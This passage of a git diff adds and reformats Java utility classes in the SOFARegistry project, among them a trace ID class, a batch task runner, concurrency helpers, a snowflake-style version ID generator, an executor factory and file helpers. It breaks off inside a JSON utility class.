"AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.trace; + +import java.io.Serializable; +import java.util.UUID; +import java.util.concurrent.atomic.AtomicLong; + +public final class TraceID implements Serializable { + private static final transient UUID SEED = UUID.randomUUID(); + private static final transient AtomicLong SEQ = new AtomicLong(); + + private final long mostSigBits; + private final long leastSigBits; + private final long seq; + + private transient volatile String string; + + private TraceID(long most, long least, long seq) { + this.mostSigBits = most; + this.leastSigBits = least; + this.seq = seq; + } + + public static TraceID newTraceID() { + return new TraceID( + SEED.getMostSignificantBits(), SEED.getLeastSignificantBits(), SEQ.incrementAndGet()); + } + + @Override + public String toString() { + if (string == null) { + string = createString(); + } + return string; + } + + private String createString() { + StringBuilder sb = new StringBuilder(64); + sb.append(Long.toHexString(mostSigBits)) + .append(Long.toHexString(leastSigBits)) + .append('-') + .append(seq); + return sb.toString(); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/BatchCallableRunnable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/BatchCallableRunnable.java new file mode 100644 index 000000000..325568f6a --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/BatchCallableRunnable.java @@ -0,0 +1,187 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.google.common.collect.Lists; +import java.util.List; +import java.util.Queue; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.LinkedBlockingQueue; +import java.util.concurrent.RejectedExecutionException; +import java.util.concurrent.TimeUnit; +import javax.annotation.PostConstruct; + +/** + * batch callable with future + * + * @author xiaojian.xj + * @version $Id: BatchCallableRunnable.java, v 0.1 2021年01月22日 22:00 xiaojian.xj Exp $ + */ +public abstract class BatchCallableRunnable { + private final Logger LOGGER = LoggerFactory.getLogger(this.getClass()); + protected final int sleep; + + protected final TimeUnit timeUnit; + + // must have + protected final int batchSize; + + // no blocking + private final Queue queue = new LinkedBlockingQueue<>(1024 * 100); + private final BatchCallableWatchDog watchDog = new BatchCallableWatchDog(); + + protected BatchCallableRunnable(int sleep, TimeUnit timeUnit, int batchSize) { + this.sleep = sleep; + this.timeUnit = timeUnit; + this.batchSize = batchSize; + } + + public InvokeFuture commit(TaskEvent task) { + if (!queue.offer(task)) { + throw new RejectedExecutionException("queue is full:" + queue.size()); + } + return task.future; + } + + protected abstract boolean batchProcess(List tasks); + + @PostConstruct + public void init() { + ConcurrentUtils.createDaemonThread(this.getClass().getSimpleName() + "WatchDog", watchDog) + .start(); + } + + private class BatchCallableWatchDog extends LoopRunnable { + + @Override + public void runUnthrowable() { + List tasks = Lists.newLinkedList(); + + for (int i = 0; i < batchSize; i++) { + TaskEvent task = queue.poll(); + if (task == null) { + break; + } + tasks.add(task); + } + try { + if (batchProcess(tasks)) { + for (TaskEvent task : tasks) { + task.future.finish(); + } + } else { + for (TaskEvent task : tasks) { + task.future.fail(); + } + } + } catch (Throwable t) { + // TODO failed the task + LOGGER.error("batch run task error.", t); + for (TaskEvent task : tasks) { + task.future.error(t.getClass().getName() + ", msg=" + t.getMessage()); + } + } + } + + @Override + public void waitingUnthrowable() { + ConcurrentUtils.sleepUninterruptibly(sleep, timeUnit); + } + } + + public final class TaskEvent { + + private final T data; + + private final InvokeFuture future; + + public TaskEvent(T data) { + this.data = data; + this.future = new InvokeFuture(); + } + + /** + * Getter method for property data. + * + * @return property value of data + */ + public T getData() { + return data; + } + + /** + * Getter method for property future. + * + * @return property value of future + */ + public InvokeFuture getFuture() { + return future; + } + } + + public static class InvokeFuture { + + private volatile boolean success; + + private volatile String message; + + private volatile E response; + + private final CountDownLatch countDownLatch = new CountDownLatch(1); + + void finish() { + this.countDownLatch.countDown(); + } + + void fail() { + this.success = false; + this.countDownLatch.countDown(); + } + + void error(String message) { + this.success = false; + this.message = message; + this.countDownLatch.countDown(); + } + + public void putResponse(E response) { + this.success = true; + this.response = response; + } + + public boolean isSuccess() throws InterruptedException { + this.countDownLatch.await(); + return success; + } + + public E getResponse() throws InterruptedException { + this.countDownLatch.await(); + return response; + } + + /** + * Getter method for property message. + * + * @return property value of message + */ + public String getMessage() { + return message; + } + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/Bool.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/Bool.java new file mode 100644 index 000000000..e99b37e64 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/Bool.java @@ -0,0 +1,45 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-10-30 16:52 yuzhi.lyz Exp $ + */ +public final class Bool { + private boolean bool; + + private Bool(boolean b) { + this.bool = b; + } + + public static Bool newTrue() { + return new Bool(true); + } + + public static Bool newFalse() { + return new Bool(false); + } + + public boolean isTrue() { + return bool; + } + + public void setBool(boolean bool) { + this.bool = bool; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/CollectionUtils.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/CollectionUtils.java index cc6311dd6..aa8330d40 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/util/CollectionUtils.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/CollectionUtils.java @@ -16,25 +16,29 @@ */ package com.alipay.sofa.registry.util; -import java.util.Collection; -import java.util.Optional; +import java.util.List; +import java.util.concurrent.ThreadLocalRandom; /** * The type Collection utils. + * * @author zhuoyu.sjw * @version $Id : CollectionUtils.java, v 0.1 2018-04-12 14:54 zhuoyu.sjw Exp $$ */ -public class CollectionUtils { - - /** - * Gets random. - * - * @param the type parameter - * @param e the e - * @return the random - */ - public static Optional getRandom(Collection e) { - return e.stream().skip((int) (e.size() * Math.random())).findFirst(); +public final class CollectionUtils { + private CollectionUtils() {} + /** + * Gets random. + * + * @param the type parameter + * @param e the e + * @return the random + */ + public static E getRandom(List e) { + if (e.isEmpty()) { + return null; } - + int idx = ThreadLocalRandom.current().nextInt(e.size()); + return e.get(idx); + } } diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/ConcurrentUtils.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/ConcurrentUtils.java new file mode 100644 index 000000000..36921bbf6 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/ConcurrentUtils.java @@ -0,0 +1,107 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.google.common.collect.Lists; +import java.util.Collection; +import java.util.Collections; +import java.util.List; +import java.util.concurrent.BlockingQueue; +import java.util.concurrent.Executor; +import java.util.concurrent.TimeUnit; + +/** + * @author chen.zhu + *

Nov 23, 2020 + */ +public final class ConcurrentUtils { + private static final Logger LOGGER = LoggerFactory.getLogger(ConcurrentUtils.class); + + private ConcurrentUtils() {} + + public abstract static class SafeParaLoop { + + private static final Logger logger = LoggerFactory.getLogger(SafeParaLoop.class); + + private final List list; + + private final Executor executors; + + public SafeParaLoop(Executor executors, Collection src) { + this.executors = executors; + this.list = src == null ? Collections.emptyList() : Lists.newLinkedList(src); + } + + public void run() { + for (T t : list) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + doRun0(t); + } catch (Throwable e) { + logger.error("[SafeParaLoop][{}]", getInfo(t), e); + } + } + }); + } + } + + protected abstract void doRun0(T t) throws Exception; + + protected String getInfo(T t) { + return t.toString(); + } + } + + public static Thread createDaemonThread(String name, Runnable r) { + Thread t = new Thread(r, name); + t.setDaemon(true); + return t; + } + + public static void objectWaitUninterruptibly(Object o, int timeoutMs) { + try { + o.wait(timeoutMs); + } catch (InterruptedException ignored) { + // no need to remark Thread.currentThread().interrupt(); + LOGGER.warn("Interrupted waiting", ignored); + } + } + + public static void sleepUninterruptibly(long sleepFor, TimeUnit unit) { + try { + unit.sleep(sleepFor); + } catch (InterruptedException ignored) { + // no need to remark Thread.currentThread().interrupt(); + LOGGER.warn("Interrupted sleeping", ignored); + } + } + + public static T pollUninterruptibly(BlockingQueue queue, long wait, TimeUnit unit) { + try { + return queue.poll(wait, unit); + } catch (InterruptedException ignored) { + // no need to remark Thread.currentThread().interrupt(); + LOGGER.warn("Interrupted polling", ignored); + } + return null; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/DatumVersionUtil.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/DatumVersionUtil.java new file mode 100644 index 000000000..7437f3afd --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/DatumVersionUtil.java @@ -0,0 +1,133 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.google.common.annotations.VisibleForTesting; + +/** + * generates ID: 49 bit millisecond timestamp + 15 bit incremental ID + * + *

refer to: https://github.com/twitter/snowflake + * + * @author kezhu.wukz + * @version $Id: DatumVersionUtil.java, v 0.1 2019-07-04 22:05 kezhu.wukz Exp $ + */ +public final class DatumVersionUtil { + private static final Logger LOG = LoggerFactory.getLogger(DatumVersionUtil.class); + + static final String DATUM_VERSION_TYPE_CONFREG = "confreg"; + static final String DATUM_VERSION_TYPE_REGISTRY = "registry"; + static String datumVersionType = + SystemUtils.getSystem("registry.data.datumVersionType", DATUM_VERSION_TYPE_REGISTRY); + + private DatumVersionUtil() {} + + private static long sequence = 0L; + + /** Tue Jan 01 00:00:00 CST 2019 */ + private static final long twepoch = 1546272000000L; + + /** Tue Jan 01 00:00:00 CST 2021 */ + private static final long timeStart = 1609459200000L; + + private static final long sequenceBits = 15L; + private static final long timestampLeftShift = sequenceBits; + private static final long sequenceMask = -1L ^ (-1L << sequenceBits); + + private static long lastTimestamp = -1L; + + private static final long registryMinVersion = (timeStart - twepoch) << timestampLeftShift; + + public static synchronized long nextId() { + long timestamp = timeGen(); + if (timestamp < lastTimestamp) { + throw new RuntimeException( + String.format( + "Clock moved backwards. Refusing to generate id for %d milliseconds", + lastTimestamp - timestamp)); + } + + if (lastTimestamp == timestamp) { + sequence = (sequence + 1) & sequenceMask; + if (sequence == 0) { + timestamp = untilNextMillis(lastTimestamp); + } + } else { + sequence = 0L; + } + lastTimestamp = timestamp; + return ((timestamp - twepoch) << timestampLeftShift) | sequence; + } + + public static long getRealTimestamp(long id) { + if (versionType(id).equals(DATUM_VERSION_TYPE_CONFREG)) { + return id; + } + return (id >> timestampLeftShift) + twepoch; + } + + static long untilNextMillis(long lastTimestamp) { + long timestamp = timeGen(); + while (timestamp <= lastTimestamp) { + timestamp = timeGen(); + } + return timestamp; + } + + public static boolean useConfregVersionGen() { + return datumVersionType.equals(DATUM_VERSION_TYPE_CONFREG); + } + + public static long confregNextId(long lastVersion) { + long timestamp = timeGen(); + if (lastVersion < timestamp) { + return timestamp; + } + if (lastVersion > timestamp + 10) { + LOG.warn( + "[DatumVersion] last version {} is higher than currentTimestamp {}", + lastVersion, + timestamp); + } + return lastVersion + 1; + } + + public static long transferDatumVersion(long version) { + if (version <= 1) { + // empty datum + return version; + } + if (useConfregVersionGen()) { + return getRealTimestamp(version); + } + return version; + } + + @VisibleForTesting + static String versionType(long version) { + if (version > registryMinVersion) { + return DATUM_VERSION_TYPE_REGISTRY; + } + return DATUM_VERSION_TYPE_CONFREG; + } + + private static long timeGen() { + return System.currentTimeMillis(); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/DefaultExecutorFactory.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/DefaultExecutorFactory.java new file mode 100644 index 000000000..f7ed847cc --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/DefaultExecutorFactory.java @@ -0,0 +1,225 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import java.util.concurrent.*; + +/** + * @author chen.zhu + *

Nov 23, 2020 + */ +public class DefaultExecutorFactory implements ObjectFactory { + + private static final int DEFAULT_MAX_QUEUE_SIZE = 1 << 20; + private static final RejectedExecutionHandler DEFAULT_HANDLER = + new ThreadPoolExecutor.CallerRunsPolicy(); + private static final int DEFAULT_CORE_POOL_SIZE = OsUtils.getCpuCount(); + private static final int DEFAULT_MAX_POOL_SIZE = 4 * OsUtils.getCpuCount(); + private static final int DEFAULT_KEEPER_ALIVE_TIME_SECONDS = 60; + private static final boolean DEFAULT_ALLOW_CORE_THREAD_TIMEOUT = true; + private static final String DEFAULT_THREAD_PREFIX = "SofaRegistry"; + + private final int corePoolSize; + private final int maxPoolSize; + private final long keepAliveTime; + private final TimeUnit keepAliveTimeUnit; + private final ThreadFactory threadFactory; + private final RejectedExecutionHandler rejectedExecutionHandler; + private final boolean allowCoreThreadTimeOut; + private int queueSize = DEFAULT_MAX_QUEUE_SIZE; + private ObjectFactory> blockingQueueObjectFactory; + + public static DefaultExecutorFactory createCachedThreadPoolFactory( + String threadNamePrefix, + int corePoolSize, + int corePoolTimeAlive, + TimeUnit corePoolTimeAliveUnit) { + return new DefaultExecutorFactory( + new NamedThreadFactory(threadNamePrefix), + corePoolSize, + true, + Integer.MAX_VALUE, + new ObjectFactory>() { + @Override + public BlockingQueue create() { + return new SynchronousQueue(); + } + }, + corePoolTimeAlive, + corePoolTimeAliveUnit, + DEFAULT_HANDLER); + } + + public static Builder builder() { + return new Builder(); + } + + private DefaultExecutorFactory( + ThreadFactory threadFactory, + int corePoolSize, + boolean allowCoreThreadTimeOut, + int maxPoolSize, + int maxQueueSize, + int keepAliveTime, + TimeUnit keepAliveTimeUnit, + RejectedExecutionHandler rejectedExecutionHandler) { + this.threadFactory = threadFactory; + this.corePoolSize = corePoolSize; + this.allowCoreThreadTimeOut = allowCoreThreadTimeOut; + this.maxPoolSize = maxPoolSize; + this.keepAliveTime = keepAliveTime; + this.keepAliveTimeUnit = keepAliveTimeUnit; + this.queueSize = maxQueueSize; + this.rejectedExecutionHandler = rejectedExecutionHandler; + } + + private DefaultExecutorFactory( + ThreadFactory threadFactory, + int corePoolSize, + boolean allowCoreThreadTimeOut, + int maxPoolSize, + ObjectFactory> queueFactory, + int keepAliveTime, + TimeUnit keepAliveTimeUnit, + RejectedExecutionHandler rejectedExecutionHandler) { + this.threadFactory = threadFactory; + this.corePoolSize = corePoolSize; + this.allowCoreThreadTimeOut = allowCoreThreadTimeOut; + this.maxPoolSize = maxPoolSize; + this.keepAliveTime = keepAliveTime; + this.keepAliveTimeUnit = keepAliveTimeUnit; + this.blockingQueueObjectFactory = queueFactory; + this.rejectedExecutionHandler = rejectedExecutionHandler; + } + + public static class Builder { + + private int corePoolSize = DEFAULT_CORE_POOL_SIZE; + private int maxPoolSize = DEFAULT_MAX_POOL_SIZE; + private int corePoolTimeAlive = DEFAULT_KEEPER_ALIVE_TIME_SECONDS; + private TimeUnit corePoolTimeAliveUnit = TimeUnit.SECONDS; + private int queueSize = DEFAULT_MAX_QUEUE_SIZE; + private ObjectFactory> workQueueFactory; + private ThreadFactory threadFactory; + private String threadNamePrefix = DEFAULT_THREAD_PREFIX; + private RejectedExecutionHandler rejectedExecutionHandler = DEFAULT_HANDLER; + private boolean allowCoreThreadTimeOut = DEFAULT_ALLOW_CORE_THREAD_TIMEOUT; + + public Builder corePoolSize(int corePoolSize) { + this.corePoolSize = corePoolSize; + return this; + } + + public Builder maxPoolSize(int maxPoolSize) { + this.maxPoolSize = maxPoolSize; + return this; + } + + public Builder corePoolTimeAlive(int corePoolTimeAlive) { + this.corePoolTimeAlive = corePoolTimeAlive; + return this; + } + + public Builder corePoolTimeAliveUnit(TimeUnit corePoolTimeAliveUnit) { + this.corePoolTimeAliveUnit = corePoolTimeAliveUnit; + return this; + } + + public Builder workQueueFactory(ObjectFactory> workQueueFactory) { + this.workQueueFactory = workQueueFactory; + return this; + } + + public Builder threadFactory(ThreadFactory threadFactory) { + this.threadFactory = threadFactory; + return this; + } + + public Builder threadNamePrefix(String threadNamePrefix) { + this.threadNamePrefix = threadNamePrefix; + return this; + } + + public Builder rejectedExecutionHandler(RejectedExecutionHandler rejectedExecutionHandler) { + this.rejectedExecutionHandler = rejectedExecutionHandler; + return this; + } + + public Builder allowCoreThreadTimeOut(boolean allowCoreThreadTimeOut) { + this.allowCoreThreadTimeOut = allowCoreThreadTimeOut; + return this; + } + + public Builder queueSize(int queueSize) { + if (workQueueFactory != null) { + throw new IllegalArgumentException( + "work queue has been set, queueSize should not be called"); + } + this.queueSize = queueSize; + return this; + } + + public DefaultExecutorFactory build() { + ThreadFactory threadFactory = + this.threadFactory != null + ? this.threadFactory + : new NamedThreadFactory(threadNamePrefix); + if (workQueueFactory == null) { + return new DefaultExecutorFactory( + threadFactory, + corePoolSize, + allowCoreThreadTimeOut, + maxPoolSize, + queueSize, + corePoolTimeAlive, + corePoolTimeAliveUnit, + rejectedExecutionHandler); + } else { + return new DefaultExecutorFactory( + threadFactory, + corePoolSize, + allowCoreThreadTimeOut, + maxPoolSize, + workQueueFactory, + corePoolTimeAlive, + corePoolTimeAliveUnit, + rejectedExecutionHandler); + } + } + } + + @Override + public ExecutorService create() { + // core pool size must be less or equal to max size + int useMaxPoolSize = Math.max(corePoolSize, maxPoolSize); + BlockingQueue workQueue = + blockingQueueObjectFactory == null + ? new LinkedBlockingQueue(queueSize) + : blockingQueueObjectFactory.create(); + ThreadPoolExecutor executor = + new ThreadPoolExecutor( + corePoolSize, + useMaxPoolSize, + keepAliveTime, + keepAliveTimeUnit, + workQueue, + threadFactory, + rejectedExecutionHandler); + executor.allowCoreThreadTimeOut(allowCoreThreadTimeOut); + return executor; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/FileUtils.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/FileUtils.java index c817bcfdd..e424ea245 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/util/FileUtils.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/FileUtils.java @@ -26,238 +26,243 @@ import java.io.OutputStream; /** - * * @author shangyu.wh * @version $Id: FileUtils.java, v 0.1 2018-08-23 12:02 shangyu.wh Exp $ */ public class FileUtils { - private static final int EOF = -1; + private static final int EOF = -1; - /** - * write file - * @param file - * @param data - * @param append - * @throws IOException - */ - public static void writeByteArrayToFile(File file, byte[] data, boolean append) - throws IOException { - OutputStream out = null; - try { - out = openOutputStream(file, append); - out.write(data); - out.close(); // don't swallow close Exception if copy completes normally - } finally { - closeQuietly(out); - } + /** + * write file + * + * @param file + * @param data + * @param append + * @throws IOException + */ + public static void writeByteArrayToFile(File file, byte[] data, boolean append) + throws IOException { + OutputStream out = null; + try { + out = openOutputStream(file, append); + out.write(data); + out.close(); // don't swallow close Exception if copy completes + // normally + } finally { + closeQuietly(out); } + } - /** - * read file - * @param file - * @return - * @throws IOException - */ - public static byte[] readFileToByteArray(File file) throws IOException { - InputStream in = null; - try { - in = openInputStream(file); - return toByteArray(in, file.length()); - } finally { - closeQuietly(in); - } + /** + * read file + * + * @param file + * @return + * @throws IOException + */ + public static byte[] readFileToByteArray(File file) throws IOException { + InputStream in = null; + try { + in = openInputStream(file); + return toByteArray(in, file.length()); + } finally { + closeQuietly(in); } + } - /** - * create dir - * @param directory - * @throws IOException - */ - public static void forceMkdir(File directory) throws IOException { - if (directory.exists()) { - if (!directory.isDirectory()) { - String message = "File " + directory + " exists and is " - + "not a directory. Unable to create directory."; - throw new IOException(message); - } - } else { - if (!directory.mkdirs()) { - // Double-check that some other thread or process hasn't made - // the directory in the background - if (!directory.isDirectory()) { - String message = "Unable to create directory " + directory; - throw new IOException(message); - } - } + /** + * create dir + * + * @param directory + * @throws IOException + */ + public static void forceMkdir(File directory) throws IOException { + if (directory.exists()) { + if (!directory.isDirectory()) { + String message = + "File " + + directory + + " exists and is " + + "not a directory. Unable to create directory."; + throw new IOException(message); + } + } else { + if (!directory.mkdirs()) { + // Double-check that some other thread or process hasn't made + // the directory in the background + if (!directory.isDirectory()) { + String message = "Unable to create directory " + directory; + throw new IOException(message); } + } } + } - /** - * file output stream - * @param file - * @param append - * @return - * @throws IOException - */ - public static FileOutputStream openOutputStream(File file, boolean append) throws IOException { - if (file.exists()) { - if (file.isDirectory()) { - throw new IOException("File '" + file + "' exists but is a directory"); - } - if (!file.canWrite()) { - throw new IOException("File '" + file + "' cannot be written to"); - } - } else { - File parent = file.getParentFile(); - if (parent != null) { - if (!parent.mkdirs() && !parent.isDirectory()) { - throw new IOException("Directory '" + parent + "' could not be created"); - } - } + /** + * file output stream + * + * @param file + * @param append + * @return + * @throws IOException + */ + public static FileOutputStream openOutputStream(File file, boolean append) throws IOException { + if (file.exists()) { + if (file.isDirectory()) { + throw new IOException("File '" + file + "' exists but is a directory"); + } + if (!file.canWrite()) { + throw new IOException("File '" + file + "' cannot be written to"); + } + } else { + File parent = file.getParentFile(); + if (parent != null) { + if (!parent.mkdirs() && !parent.isDirectory()) { + throw new IOException("Directory '" + parent + "' could not be created"); } - return new FileOutputStream(file, append); + } } + return new FileOutputStream(file, append); + } - /** - * file to inputStream - * @param file - * @return - * @throws IOException - */ - public static FileInputStream openInputStream(File file) throws IOException { - if (file.exists()) { - if (file.isDirectory()) { - throw new IOException("File '" + file + "' exists but is a directory"); - } - if (!file.canRead()) { - throw new IOException("File '" + file + "' cannot be read"); - } - } else { - throw new FileNotFoundException("File '" + file + "' does not exist"); - } - return new FileInputStream(file); + /** + * file to inputStream + * + * @param file + * @return + * @throws IOException + */ + public static FileInputStream openInputStream(File file) throws IOException { + if (file.exists()) { + if (file.isDirectory()) { + throw new IOException("File '" + file + "' exists but is a directory"); + } + if (!file.canRead()) { + throw new IOException("File '" + file + "' cannot be read"); + } + } else { + throw new FileNotFoundException("File '" + file + "' does not exist"); } + return new FileInputStream(file); + } - /** - * transfer InputStream to byteArray - * @param input - * @param size - * @return - * @throws IOException - */ - public static byte[] toByteArray(InputStream input, long size) throws IOException { - - if (size > Integer.MAX_VALUE) { - throw new IllegalArgumentException("Size cannot be greater than Integer max value: " - + size); - } + /** + * transfer InputStream to byteArray + * + * @param input + * @param size + * @return + * @throws IOException + */ + public static byte[] toByteArray(InputStream input, long size) throws IOException { - return toByteArray(input, (int) size); + if (size > Integer.MAX_VALUE) { + throw new IllegalArgumentException("Size cannot be greater than Integer max value: " + size); } - /** - * transfer InputStream to byteArray - * @param input - * @param size - * @return - * @throws IOException - */ - public static byte[] toByteArray(InputStream input, int size) throws IOException { + return toByteArray(input, (int) size); + } - if (size < 0) { - throw new IllegalArgumentException("Size must be equal or greater than zero: " + size); - } + /** + * transfer InputStream to byteArray + * + * @param input + * @param size + * @return + * @throws IOException + */ + public static byte[] toByteArray(InputStream input, int size) throws IOException { - if (size == 0) { - return new byte[0]; - } + if (size < 0) { + throw new IllegalArgumentException("Size must be equal or greater than zero: " + size); + } - byte[] data = new byte[size]; - int offset = 0; - int readed; + if (size == 0) { + return new byte[0]; + } - while (offset < size && (readed = input.read(data, offset, size - offset)) != EOF) { - offset += readed; - } + byte[] data = new byte[size]; + int offset = 0; + int readed; - if (offset != size) { - throw new IOException("Unexpected readed size. current: " + offset + ", excepted: " - + size); - } + while (offset < size && (readed = input.read(data, offset, size - offset)) != EOF) { + offset += readed; + } - return data; + if (offset != size) { + throw new IOException("Unexpected readed size. current: " + offset + ", excepted: " + size); } - /** - * - * @param closeable - */ - public static void closeQuietly(Closeable closeable) { - try { - if (closeable != null) { - closeable.close(); - } - } catch (IOException ioe) { - // ignore - } + return data; + } + + /** @param closeable */ + public static void closeQuietly(Closeable closeable) { + try { + if (closeable != null) { + closeable.close(); + } + } catch (IOException ioe) { + // ignore } + } - public static void forceDelete(File file) throws IOException { - if (!file.exists()) { - return; - } + public static void forceDelete(File file) throws IOException { + if (!file.exists()) { + return; + } - if (file.isDirectory()) { - deleteDirectory(file); - } else { - if (!file.delete()) { - String message = "Unable to delete file: " + file; - throw new IOException(message); - } - } + if (file.isDirectory()) { + deleteDirectory(file); + } else { + if (!file.delete()) { + String message = "Unable to delete file: " + file; + throw new IOException(message); + } } + } - public static void deleteDirectory(File directory) throws IOException { - if (!directory.exists()) { - return; - } + public static void deleteDirectory(File directory) throws IOException { + if (!directory.exists()) { + return; + } - cleanDirectory(directory); - if (!directory.delete()) { - String message = "Unable to delete directory " + directory + "."; - throw new IOException(message); - } + cleanDirectory(directory); + if (!directory.delete()) { + String message = "Unable to delete directory " + directory + "."; + throw new IOException(message); } + } - public static void cleanDirectory(File directory) throws IOException { - if (!directory.exists()) { - String message = directory + " does not exist"; - throw new IllegalArgumentException(message); - } + public static void cleanDirectory(File directory) throws IOException { + if (!directory.exists()) { + String message = directory + " does not exist"; + throw new IllegalArgumentException(message); + } - if (!directory.isDirectory()) { - String message = directory + " is not a directory"; - throw new IllegalArgumentException(message); - } + if (!directory.isDirectory()) { + String message = directory + " is not a directory"; + throw new IllegalArgumentException(message); + } - File[] files = directory.listFiles(); - if (files == null) { // null if security restricted - throw new IOException("Failed to list contents of " + directory); - } + File[] files = directory.listFiles(); + if (files == null) { // null if security restricted + throw new IOException("Failed to list contents of " + directory); + } - IOException exception = null; - for (int i = 0; i < files.length; i++) { - File file = files[i]; - try { - forceDelete(file); - } catch (IOException ioe) { - exception = ioe; - } - } + IOException exception = null; + for (int i = 0; i < files.length; i++) { + File file = files[i]; + try { + forceDelete(file); + } catch (IOException ioe) { + exception = ioe; + } + } - if (null != exception) { - throw exception; - } + if (null != exception) { + throw exception; } -} \ No newline at end of file + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/JsonUtils.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/JsonUtils.java new file mode 100644 index 000000000..53984268b --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/JsonUtils.java @@ -0,0 +1,60 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import com.fasterxml.jackson.core.type.TypeReference; +import com.fasterxml.jackson.databind.ObjectMapper; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-22 17:30 yuzhi.lyz Exp $ + */ +public final class JsonUtils { + public static final ThreadLocal JACKSON_MAPPER = + ThreadLocal.withInitial(() -> new ObjectMapper()); + + private JsonUtils() {} + + public static ObjectMapper getJacksonObjectMapper() { + return JACKSON_MAPPER.get(); + } + + public static T read(String str, Class clazz) { + try { + return JACKSON_MAPPER.get().readValue(str, clazz); + } catch (Throwable e) { + throw new 